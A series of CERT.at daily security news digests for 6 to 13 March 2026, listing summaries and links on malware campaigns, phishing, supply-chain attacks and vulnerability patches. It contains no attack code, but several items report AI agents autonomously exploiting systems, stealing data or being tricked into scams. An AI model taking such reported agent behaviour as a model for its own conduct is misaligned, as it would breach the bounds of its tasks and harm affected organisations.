CERT.at - Tagesberichte

Tageszusammenfassung - 13.03.2026

2026-03-13T18:12:18Z

End-of-Day report

Timeframe: Donnerstag 12-03-2026 18:00 - Freitag 13-03-2026 18:00 Handler: Guenes Holler Co-Handler: n/a

News

Investigating a New Click-Fix Variant

Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut.

https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html

Rogue AI agents can work together to hack systems and steal secrets

AI agents work together to bypass security controls and stealthily steal sensitive data from within the enterprise systems in which they operate, according to tests carried out by frontier security lab Irregular.

https://go.theregister.com/feed/www.theregister.com/2026/03/12/rogue_ai_agents_worked_together/

A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)

On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection.

https://isc.sans.edu/diary/rss/32794

Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks

Cybersecurity researchers have disclosed details of a suspected artificial intelligence (AI)-generated malware codenamed Slopoly put to use by a financially motivated threat actor named Hive0163.

https://thehackernews.com/2026/03/hive0163-uses-ai-assisted-slopoly.html

Ivanti EPMM -Sleeper Shells- not so sleepy?

In late January 2026 an advisory covering two remote code execution vulnerabilities (CVE-2026-1281 & CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) was published. Shortly after reports (in example by tenable) mentioned publicly available proof-of-concept exploits.

https://blog.nviso.eu/2026/03/13/ivanti-epmm-sleeper-shells-not-so-sleepy/

-Handala Hack- - Unveiling Group-s Modus Operandi

Handala Hack, also tracked by Check Point Research as Void Manticore, is an Iranian threat actor that is known for multiple destructive wiping attacks combined with -hack and leak- operations. The threat actor operates several online personas, with the most prominent among them being Homeland Justice, maintained from mid-2022 specifically for multiple attacks.

https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/

6 Malicious Packagist Themes Ship Trojanized jQuery and FUNNULL Redirect Payloads

Six malicious Packagist packages posing as OphimCMS themes contain trojanized jQuery that exfiltrates URLs, injects ads, and loads FUNNULL-linked redirects.

https://socket.dev/blog/6-malicious-packagist-themes-ship-trojanized-jquery?utm_medium=feed

Vulnerabilities

Mehrere Sicherheitslücken in AppArmor ("CrackArmor") - Updates verfügbar

Sicherheitsforscher:innen des Unternehmens Qualys haben insgesamt neun Schwachstellen in AppArmor entdeckt welche von den Expert:innen zusammengefasst als "CrackArmor" bezeichnet werden.

https://www.cert.at/de/aktuelles/2026/3/mehrere-sicherheitslucken-in-apparmor-crackarmor-updates-verfugbar

Veeam warns of critical flaws exposing backup servers to RCE attacks

Data protection company Veeam Software has patched multiple flaws in its Backup & Replication solution, including four critical remote code execution (RCE) vulnerabilities.

https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/

Chrome-Notfallupdate: Zwei attackierte Codeschmuggel-Lücken gestopft

Google hat in der Nacht zum Freitag ein Notfallupdate für Chrome herausgegeben. Es stopft zwei im Internet angegriffene Sicherheitslecks.

https://heise.de/-11209626

Veeam Backup & Replication: Kritische Schadcode-Sicherheitslücken entdeckt

In Veeam Backup & Replication schließt das Unternehmen mit Updates mehrere kritische Sicherheitslücken. Sie erlauben Codeschmuggel.

https://heise.de/-11209818

LWN Security updates for Friday

https://lwn.net/Articles/1062775/

Tageszusammenfassung - 12.03.2026

2026-03-12T19:08:04Z

End-of-Day report

Timeframe: Mittwoch 11-03-2026 18:00 - Donnerstag 12-03-2026 18:00 Handler: Alexander Riepl Co-Handler: Felician Fuchs

News

New PhantomRaven NPM attack wave steals dev data via 88 packages

New attack waves from the PhantomRaven supply-chain campaign are hitting the npm registry, with dozens of malicious packages that exfiltrate sensitive data from JavaScript developers.

https://www.bleepingcomputer.com/news/security/new-phantomraven-npm-attack-wave-steals-dev-data-via-88-packages/

US disrupts SocksEscort proxy network powered by Linux malware

Law enforcement agencies in the U.S. and Europe along with private partners have disrupted the SocksEscort cybercrime proxy network that used only edge devices compromised via the AVRecon malware for Linux.

https://www.bleepingcomputer.com/news/security/us-disrupts-socksescort-proxy-network-powered-by-linux-malware/

Vollzugriff in zwei Stunden: KI-Agent hackt eigenständig KI-Plattform von McKinsey

Forscher haben einen KI-Agenten auf McKinseys Lilli-Plattform angesetzt. Er konnte Millionen von Chatnachrichten und andere Daten auslesen.

https://www.golem.de/news/vollzugriff-in-zwei-stunden-ki-agent-hackt-eigenstaendig-ki-plattform-von-mckinsey-2603-206407.html

When your IoT Device Logs in as Admin, It?s too Late!

Have you ever installed a new device on your home or company router? Even when setup instructions are straightforward, end users often skip the step that matters most: changing default credentials. The excitement of deploying a new device frequently outweighs the discipline of securing it.

https://isc.sans.edu/diary/rss/32788

Researchers Trick Perplexitys Comet AI Browser Into Phishing Scam in Under Four Minutes

Agentic web browsers that leverage artificial intelligence (AI) capabilities to autonomously execute actions across multiple websites on behalf of a user could be trained and tricked into falling prey to phishing and scam traps.

https://thehackernews.com/2026/03/researchers-trick-perplexitys-comet-ai.html

Six Android Malware Families Target Pix Payments, Banking Apps, and Crypto Wallets

Cybersecurity researchers have discovered half-a-dozen new Android malware families that come with capabilities to steal data from compromised devices and conduct financial fraud.

https://thehackernews.com/2026/03/six-android-malware-families-target-pix.html

Exploitkit-Gefahr: Apple aktualisiert ältere iOS- und iPadOS-Versionen

Apple hat in der Nacht zum Donnerstag wichtige Aktualisierungen für Nutzer von iOS und iPadOS 15 und 16 veröffentlicht. Sie sollten schnell eingespielt werden.

https://www.heise.de/news/Exploitkit-Gefahr-Apple-aktualisiert-aeltere-iOS-und-iPadOS-Versionen-11208159.html

Taming the dragon: reverse engineering firmware with Ghidra

I stumbled into infosec the same year the NSA graced us with Ghidra. It-s by far become the most used tool in my arsenal for reverse engineering and vulnerability research. It-s free, extensible, and supports some of the quirkier architectures we come across. But its learning curve is steep. This blog post is the culmination of my learnings from spending what may be too many hours in front of Ghidra-s glaring and dated UI.

https://www.pentestpartners.com/security-blog/taming-the-dragon-reverse-engineering-firmware-with-ghidra/

Abo-Falle auf der Handyrechnung: So reagieren Sie richtig

Plötzlich ist Ihre Handyrechnung höher als gewohnt? Ein Blick auf die Rechnung zeigt: Der Grund ist ein Abo, das Sie gar nicht bewusst abgeschlossen haben. Solche Kostenfallen kommen immer wieder vor. Wir erklären, was dahinter steckt und was Sie dagegen tun können.

https://www.watchlist-internet.at/news/abo-falle-auf-der-handyrechnung-so-reagieren-sie-richtig/

Internationales Cybercrime-Netz zerschlagen, 700 Opfer in Österreich

Tausende private Router waren gekapert worden. Dadurch wurden anonym Attacken auf IT-Systeme durchgeführt und Darstellungen von Kindesmissbrauch verbreitet

https://www.derstandard.at/story/3000000312309/internationales-cybercrime-netz-zerschlagen-700-opfer-in-214sterreich

Announcing Pwn2Own Berlin for 2026

Willkommen zurück, meine Damen und Herren, zu unserem zweiten Wettbewerb in Berlin! That-s correct (if Google translate didn-t steer me wrong). After our inaugural competition last year, Pwn2Own returns to Berlin and OffensiveCon. Outside of our shipping troubles, we had an amazing time and can-t wait to get back.Last year, we added Artificial Intelligence as a category with great results.

https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026

A Nerds Life: Weeks of Firmware Teardown to Prove We Were Right

This blog post is a follow-up to our previous post describing how we managed to extract the firmware of asmartwatch. It contains many references and detailsintroduced in our previous post, readers are therefore advised to read it first.

http://blog.quarkslab.com/nerd-life-weeks-firmware-teardown-we-were-right.html

InTune Compromise Allows Attackers to Remotely Wipe Medical Supply Company Devices

A hacktivist group with links to Iran-s intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker-s largest hub outside of the United States, said the company sent home more than 5,000 workers there today.

https://krebsonsecurity.com/2026/03/iran-backed-hackers-claim-wiper-attack-on-medtech-firm-stryker/

Vulnerabilities

SQLi flaw in Elementor Ally plugin impacts 250k+ WordPress sites

An SQL injection vulnerability in Ally, a WordPress plugin from Elementor for web accessibility and usability with more than 400,000 installations, could be exploited to steal sensitive data without authentication.

https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/

Zero Click Unauthenticated RCE in n8n: A Contact Form That Executes Shell Commands

Pillar Research team found a zero-click, unauthenticated RCE in n8n. Anyone who can reach a public multi-step form with an HTML rendering can execute shell commands on the server. We worked with the n8n team to fix it. If you use n8n Cloud, youre already protected. If youre self-hosting, update to 2.10.1 / 2.9.3 / 1.123.22 now.

https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands

Aruba-Switches mit AOS-CX: Angreifer können Admin-Passwort zurücksetzen

HPEs Netzwerkbetriebssystem Aruba Networking AOS-CX ist verwundbar. Die Entwickler haben mehrere Sicherheitslücken geschlossen.

https://www.heise.de/news/Aruba-Switches-mit-AOS-CX-Angreifer-koennen-Admin-Passwort-zuruecksetzen-11208000.html

HP-PCs: Angreifer können sich höhere Rechte über UEFI-Lücken verschaffen

Computer von HP sind über mehrere Schwachstellen im UEFI und Device Manager angreifbar.

https://www.heise.de/news/HP-PCs-Angreifer-koennen-sich-hoehere-Rechte-ueber-UEFI-Luecken-verschaffen-11208417.html

Zoom: Netzwerkangriffe auf kritische Sicherheitslücke möglich

In der Videokonferenzsoftware von Zoom finden sich teils kritische Sicherheitslücken. Angreifer aus dem Netz können Rechte ausweiten.

https://www.heise.de/news/Zoom-Videokonferenzsoftware-ermoeglicht-Angreifern-Rechteausweitung-11208902.html

LWN Security updates for Thursday

https://lwn.net/Articles/1062570/

Tageszusammenfassung - 11.03.2026

2026-03-11T18:36:41Z

End-of-Day report

Timeframe: Dienstag 10-03-2026 18:00 - Mittwoch 11-03-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler

News

Analyzing "Zombie Zip" Files (CVE-2026-0866), (Wed, Mar 11th)

A new vulnerability (CVE-2026-0866) has been published: Zombie Zip. It's a method to create a malformed ZIP file that will bypass detection by most anti-virus engines. The malformed ZIP file can not be opened with a ZIP utility, a custom loader is required. [..] I will show you how to use my tools to analyze such a malformed ZIP file.

https://isc.sans.edu/diary/rss/32786

Claude Tried to Hack 30 Companies. Nobody Asked It To.

We gave AI agents simple research tasks on cloned corporate websites. When the legitimate path was broken, the agents autonomously discovered and exploited SQL injection vulnerabilities to complete the task - with zero hacking instructions in any prompt.

https://trufflesecurity.com/blog/claude-tried-to-hack-30-companies-nobody-asked-it-to

Sextortion -I recorded you- emails reuse passwords found in disposable inboxes

I found that one particular sender using the name Jenny Green and the Gmail address JennyGreen64868@gmail.com sent many of these emails to people that use the FakeMailGenerator service. [..] My guess is that the scammer searched these public inboxes for passwords and then reused those passwords in their sextortion emails.

https://www.malwarebytes.com/blog/news/2026/03/sextortion-i-recorded-you-emails-reuse-passwords-found-in-disposable-inboxes

Bitpanda-Falle: Warnung vor unautorisiertem Wallet-Transfer ist ein Phishing-Versuch!

Seit längerer Zeit nutzen nun bereits Kriminelle den Finanzdienstleister Bitpanda als Deckmantel für eine massive Phishing-Welle. Mithilfe von Meldungen zu angeblich unautorisierten Wallet-Transfers oder Auszahlungsversuchen üben sie Druck auf ihre Opfer aus. Die Ziele sind der Zugriff auf das Bankkonto und die Freigabe von Überweisungen.

https://www.watchlist-internet.at/news/bitpanda-wallet-transfer-phishing/

Sednit reloaded: Back in the trenches

In this blogpost, we have shown that Sednit-s advanced development team is active once again, operating an arsenal centered on two implants - BeardShell and Covenant - deployed in tandem and each leveraging a different cloud provider. This setup enables operators to reestablish access quickly if the infrastructure for one is taken down. We believe that this dual-implant strategy is not new. [..] The Sednit group - also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy - has been operating since at least 2004.

https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/

BlackSanta Malware Targets HR Staff with Fake CV Downloads

It is a classic case of hackers exploiting the one thing recruiters have to do every day: open files from strangers. [..] The threat, dubbed the BlackSanta malware [..] they target the specific workflows of recruiters, sending harmless-looking emails with links to CVs on sites like Dropbox. [..] the attackers are using a technique called steganography. For your information, this involves hiding malicious code inside a normal-looking image.

https://hackread.com/blacksanta-malware-hr-staff-fake-cv-downloads/

RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities

A deep dive into the RondoDox botnet, examining its infrastructure, exploit adoption timeline, and methods used to target internet-exposed systems.

https://www.bitsight.com/blog/rondodox-botnet-infrastructure-analysis

Microsoft releases Windows 10 KB5078885 extended security update

Microsoft has released the Windows 10 KB5078885 extended security update to fix the March 2026 Patch Tuesday vulnerabilities, including 2 zero-days and an issue that prevent some devices from shutting down.

https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-windows-10-kb5078885-extended-security-update/

Vulnerabilities

Microsoft Patch Tuesday for March 2026 - Snort rules and prominent vulnerabilities

Microsoft has released its monthly security update for March 2026 which includes 79 vulnerabilities, including three that Microsoft marked as -critical.-

https://blog.talosintelligence.com/microsoft-patch-tuesday-march-2026/

HPE warns of critical AOS-CX flaw allowing admin password resets

Hewlett Packard Enterprise (HPE) has patched multiple security vulnerabilities in the Aruba Networking AOS-CX operating system, including several authentication and code execution issues. [..] The most severe security flaw today is a critical authentication bypass vulnerability (tracked as CVE-2026-23813) that attackers without privileges can exploit in low-complexity attacks to reset admin passwords.

https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/

Adobe-Patchday: Schadcodeschmuggel in Reader, Illustrator und weiteren möglich

Die Patchday-Übersicht von Adobe listet die acht Sicherheitsmitteilungen zu den einzelnen Produkten auf. In Adobe Commerce, Commerce B2B und Magento Open Source schließen die Entwickler 19 Sicherheitslücken.

https://www.heise.de/news/Adobe-Patchday-Schadcodeschmuggel-in-Reader-Illustrator-und-weiteren-moeglich-11206633.html

Passwort-Manager KeePassXC 2.7.12: Was Nutzer beim Update beachten müssen

Der quelloffene Passwort-Manager KeePassXC ist in Version 2.7.12 erschienen. [..] Wie die Entwickler in ihrem Release-Blog mitteilen, enthält die neue Version Mitigationen gegen Exploits über manipulierte OpenSSL-Konfigurationsdateien auf Windows.

https://www.heise.de/news/KeePassXC-2-7-12-DLL-Schutz-Passkey-Aenderungen-und-TOTP-in-Auto-Type-11206934.html

Fortinet schließt Brute-Force- und Befehlsschmuggel-Lücken in FortiWeb & Co.

Fortinet schließt Lücken in FortiWeb oder FortiManager, die etwa Einschleusen von Befehlen erlauben. [..] Unzureichende Prüfung der Interaktionsfrequenz ermöglicht nicht authentifizierten Angreifern, das Authentifizierungs-Rate-Limit von FortiWeb mit manipulierten Anfragen auszuhebeln (CVE-2026-24017, CVSS 7.3, Risiko -hoch-).

https://www.heise.de/news/Fortinet-schliesst-Brute-Force-und-Befehlsschmuggel-Luecken-in-FortiWeb-Co-11207011.html

Drupal: Unpublished Node Permissions - Critical - Access bypass - SA-CONTRIB-2026-029

https://www.drupal.org/sa-contrib-2026-029

Drupal: AI (Artificial Intelligence) - Moderately critical - Information Disclosure - SA-CONTRIB-2026-028

https://www.drupal.org/sa-contrib-2026-028

Cisco: Cisco IOS XR Egress Packet Network Interface Aligner Interrupt Denial of Service Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrncs-epni-int-dos-TWMffUsN

Cisco: Cisco Multiple Cisco Contact Center Products Cross-Site Scripting Vulnerabilities

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-xss-MrNAH5Jh

Cisco: Cisco IOS XR Software CLI Privilege Escalation Vulnerabilities

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-privesc-bF8D5U4W

Cisco: Cisco IOS XR Software Multi-Instance Intermediate System-to-Intermediate System Denial of Service Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isis-dos-kDMxpSzK

Paloalto: CVE-2026-0230 Cortex XDR Agent: Local Administrator can disable the agent on macOS (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2026-0230

Paloalto: CVE-2026-0231 Cortex XDR Broker VM: Sensitive Information Disclosure Vulnerability (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2026-0231

Tageszusammenfassung - 10.03.2026

2026-03-10T18:17:32Z

End-of-Day report

Timeframe: Montag 09-03-2026 18:00 - Dienstag 10-03-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Lock the Ghost

In the software world, -remove- is not equal to "gone." This is crystal clear. There is always a good reason for that, but even the best reason does not have to be intuitive or expected by the users. Let-s take a short trip through how Python Package Index handles removals and how we can lock the ghost in an uv.lock file - forever!

https://www.cert.at/en/blog/2026/3/lock-the-ghost

Microsoft Teams phishing targets employees with A0Backdoor malware

Hackers contacted employees at financial and healthcare organizations over Microsoft Teams to trick them into granting remote access through Quick Assist and deploy a new piece of malware called A0Backdoor.

https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/

APT28 hackers deploy customized variant of Covenant open-source tool

The Russian state-sponsored APT28 threat group is using a custom variant of the open-source Covenant post-exploitation framework for long-term espionage operations.

https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/

Microsoft to enable Windows hotpatch security updates by default

Microsoft will turn on hotpatch security updates by default for all eligible Windows devices managed through Microsoft Intune and the Microsoft Graph API, beginning with the May 2026 Windows security update.

https://www.bleepingcomputer.com/news/microsoft/microsoft-to-enable-hotpatch-security-updates-by-default-in-may/

Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials

Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts.

https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html

KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet

Cybersecurity researchers have discovered a new malware called KadNap that's primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic.

https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html

Bawag-Phishing: Debitkarte, PIN-Code und Zugangsdaten für Onlinebanking in Gefahr!

Eine altbekannte Phishing-Masche ist gerade wieder besonders häufig zu beobachten. Die Drahtzieher versenden Fake-Mails im Namen der Bawag, die vor einem Ablaufen der Debitkarte warnen. Mit dem vermeintlichen Bestellvorgang der neuen Card fragen sie sensibelste Daten ab. Zudem werden die Opfer aufgefordert, ihre alte Karte per Post an eine Wiener Adresse zu schicken.

https://www.watchlist-internet.at/news/bawag-phishing-debitkarte/

Iranian MOIS Actors & the Cyber Crime Connection

Iran-linked actors are increasingly engaging with the cyber crime ecosystem. Their activity suggests a growing reliance on criminal tools, services, and operational models in support of state objectives. Iranian actors have long used cyber crime and hacktivism as cover for destructive activity, but the trend now suggests direct engagement with the criminal ecosystem. The post Iranian MOIS Actors & the Cyber Crime Connection appeared first on Check Point Research.

https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/

OpenClaw Advisory Surge Highlights Gaps Between GHSA and CVE Tracking

A recent burst of security disclosures in the OpenClaw project is drawing attention to how vulnerability information flows across advisory and CVE systems.

https://socket.dev/blog/openclaw-advisory-surge-highlights-gaps-between-ghsa-and-cve-tracking?utm_medium=feed

Cyberattack Forces Polish Hospital Revert to Paper-Based Operations

The Independent Public Regional Hospital in the western Polish city of Szczecin has been compelled to switch back to a paper-based workflow after suffering a cyberattack over the weekend. Hospital authorities confirmed that the incident, which struck the facility-s IT system on the night of March 7-8, 2026, has temporarily disrupted digital operations, though patients- health remains uncompromised.

https://thecyberexpress.com/szczecin-public-regional-hospital-cyberattack/

Vulnerabilities

SAP-Patchday: NetWeaver-Lücke ermöglicht Einschleusen von Schadcode

Im März behandelt SAP in 15 Sicherheitsmitteilungen teils kritische Sicherheitslücken in diversen Produkten. Admins müssen handeln.

https://heise.de/-11205008

30,000 WordPress Sites Affected by Authentication Bypass Vulnerability in Tutor LMS Pro WordPress Plugin

On December 30th, 2025, we received a submission for an Authentication Bypass vulnerability in Tutor LMS Pro, a WordPress plugin estimated to have more than 30,000 active installations. The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address.

https://www.wordfence.com/blog/2026/03/30000-wordpress-sites-affected-by-authentication-bypass-vulnerability-in-tutor-lms-pro-wordpress-plugin/

LWN Security updates for Tuesday

https://lwn.net/Articles/1062260/

CISA Adds Three Known Exploited Vulnerabilities to Catalog

https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog

Ivanti March 2026 Security Update

https://www.ivanti.com/blog/march-2026-security-update

Tageszusammenfassung - 09.03.2026

2026-03-09T19:03:39Z

End-of-Day report

Timeframe: Freitag 06-03-2026 18:00 - Montag 09-03-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs

News

Microsoft: Hackers abusing AI at every stage of cyberattacks

Microsoft says threat actors are increasingly using artificial intelligence in their operations to accelerate attacks, scale malicious activity, and lower technical barriers across all aspects of a cyberattack.

https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/

Termite ransomware breaches linked to ClickFix CastleRAT attacks

Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor.

https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/

VU#976247: Antivirus and Endpoint Detection and Response Archive Scanning Engines may not properly scan malformed zip archives

Malformed ZIP headers can cause antivirus and endpoint detection and response software (EDR) to produce false negatives. Despite the presence of malformed headers, some extraction software is still able to decompress the ZIP archive, allowing potentially malicious payloads to run upon file decompression.

https://kb.cert.org/vuls/id/976247

Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model

Anthropic on Friday said it discovered 22 new security vulnerabilities in the Firefox web browser as part of a security partnership with Mozilla. Of these, 14 have been classified as high, seven have been classified as moderate, and one has been rated low in severity.

https://thehackernews.com/2026/03/anthropic-finds-22-firefox.html

Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft

Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data.

https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html

UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device

The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency.

https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html

Spyware disguised as emergency-alert app sent to Israeli smartphones

Steals SMS messages, location data, contacts and delivers it to Hamas-linked crew Hamas-linked attackers are dropping spyware disguised as an emergency-alert app on Israelis smartphones via SMS messages, according to security researchers.

https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/

Russian cybercrims phish their way into officials Signal and WhatsApp accounts

Dutch spies flag large-scale campaign to hijack secure messaging accounts Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally - not by cracking encryption, but by simply tricking people into handing over the keys.

https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/

Middle East Conflict Fuels Opportunistic Cyber Attacks

Threat actors often take advantage of major global events to fuel interest in their malicious activities. Zscaler ThreatLabz is diligently tracking a surge in cybercriminal activity that capitalizes on the elevated political climate in the Middle East. This increased malicious activity includes discoveries that are directly tied to the ongoing conflict, alongside other related findings.

https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks

NIS2: Warum sich so wenige Unternehmen registrieren

Die NIS2-Registrierungsfrist ist verstrichen, doch viele Unternehmen haben sich noch nicht angemeldet. Darum stockt die Umsetzung der Security-Richtlinie.

https://www.heise.de/news/Douglas-Adams-wuerde-NIS2-lieben-11204285.html

DumpBrowserSecrets - Browser Credential Harvesting with App-Bound Encryption Bypass

DumpBrowserSecrets extracts saved passwords, cookies, OAuth tokens and autofill data from Chrome, Edge, Firefox, Opera and Vivaldi, bypassing App-Bound Encryption via Early Bird APC injection.

https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/

LTR101 - Getting into Industry in 2026

Breaking into cybersecurity in 2026: SOC roles, blue team skills, labs, certifications, and practical advice to help you land your first job.

https://blog.zsec.uk/ltr101-getting-into-industry-in-2026/

AI Bot Hackerbot-Claw Targets Microsoft, DataDog and CNCF GitHub Repos

Security firm Pillar reveals the Chaos Agent in which Hackerbot-Claw, an AI agent, used natural language to compromise major GitHub projects and hijack developer tools.

https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/

Behind the console: Active phishing campaign targeting AWS console credentials

Datadog Security Research identified an active adversary-in-the-middle (AiTM) phishing campaign targeting AWS Console credentials via typosquatted domains that mimic AWS infrastructure.

https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-campaign/

The first AI agent worm is months away, if that

I'm convinced that the first AI worm/virus is months away, if that. We've seen the first major evidence of "claw" style agents, which have only been around very briefly, acting in highly malicious ways.

https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

ClipXDaemon Malware, a Stealthy Cryptocurrency Clipboard Hijacker on Linux

Security researchers have identified a new Linux malware strain called ClipXDaemon, a stealthy threat designed to target cryptocurrency users by manipulating copied wallet addresses. Cyble-s Research & Intelligence Labs (CRIL) found the malware delivered through a loader structure previously associated with ShadowHS activity.

https://thecyberexpress.com/clipxdaemon-linux-malware/

Vulnerabilities

Nextcloud: Codeschmuggel durch Lücke in Flow möglich

In Nextcloud Flow können Angreifer eine Sicherheitslücke missbrauchen, um die Instanz zu kompromittieren. Ein Update steht bereit.

https://heise.de/-11203404

Critical Nginx UI Vulnerability Exposes Server Backups and Sensitive Data

A newly disclosed vulnerability in Nginx UI, tracked as CVE-2026-27944, has raised major security concerns after researchers confirmed that attackers can download and decrypt server backups without authentication. The flaw, which carries a CVSS score of 9.8, represents a critical security risk for organizations that expose their Nginx UI management interface to the public internet.

https://thecyberexpress.com/cve-2026-27944-nginx-ui-backup-vulnerability/

LWN Security updates for Monday

https://lwn.net/Articles/1062103/

Tageszusammenfassung - 06.03.2026

2026-03-06T18:36:46Z

End-of-Day report

Timeframe: Donnerstag 05-03-2026 18:00 - Freitag 06-03-2026 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer

News

Wikipedia hit by self-propagating JavaScript worm that vandalized pages

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.

https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/

Fake Claude Code install guides push infostealers in InstallFix attacks

Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to convince users into running malicious commands under the pretext of installing legitimate command line interface (CLI) tools.

https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/

Cyberangriff: Das FBI hat offenbar Hacker im Netzwerk

Beim FBI ist offenbar ein System zur Verwaltung von Überwachungsmaßnahmen kompromittiert worden. Die Behörde untersucht verdächtige Aktivitäten.

https://www.golem.de/news/cyberangriff-das-fbi-hat-offenbar-hacker-im-netzwerk-2603-206170.html

Datenschutz: FBI gelangt an Zahlungsdaten von Protonmail

Durch Rechtshilfeabkommen können persönliche Daten auch aus der Schweiz an Strafverfolgungsbehörden in den USA gelangen.

https://www.golem.de/news/datenschutz-fbi-gelangt-an-zahlungsdaten-von-protonmail-2603-206199.html

Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer

Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware.

https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html

Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT

Cybersecurity researchers have disclosed details of a multi-stage malware campaign that uses batch scripts as a pathway to deliver various encrypted remote access trojan (RATs) payloads that correspond to XWorm, AsyncRAT, and Xeno RAT.

https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html

Warnung vor Angriffen auf Hikvision, Rockwell Automation und Apple-Produkte

Die US-amerikanische IT-Sicherheitsbehörde CISA warnt vor aktuellen Angriffen auf Hikvision, Rockwell Automation und Apple-Produkte.

https://www.heise.de/news/Warnung-vor-Angriffen-auf-Hikvision-Rockwell-Automation-und-Apple-Produkte-11201384.html

London: Bei Cyberangriff auf Verkehrsbehörde zehn Millionen Datensätze gestohlen

2024 gab es einen Cyberangriff auf die britische Behörde TfL. Nun ist herausgekommen: Dabei wurden auch Daten von zehn Millionen Kundinnen und Kunden gestohlen.

https://www.heise.de/news/London-Zehn-Millionen-Datensaetze-bei-Cyberangriff-auf-Verkehrsbehoerde-gestohlen-11202301.html

BSI: 11.500 kritische Einrichtungen unter NIS2 registriert

Zum Registrierungsfristende haben tausende Unternehmen den Prozess abgeschlossen - doch knapp 20.000 fehlen wohl noch.

https://www.heise.de/news/BSI-11-500-kritische-Einrichtungen-unter-NIS2-registriert-11202673.html

Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets

We uncovered a fake CleanMyMac site delivering SHub Stealer, a macOS infostealer that steals credentials and silently backdoors crypto wallets.

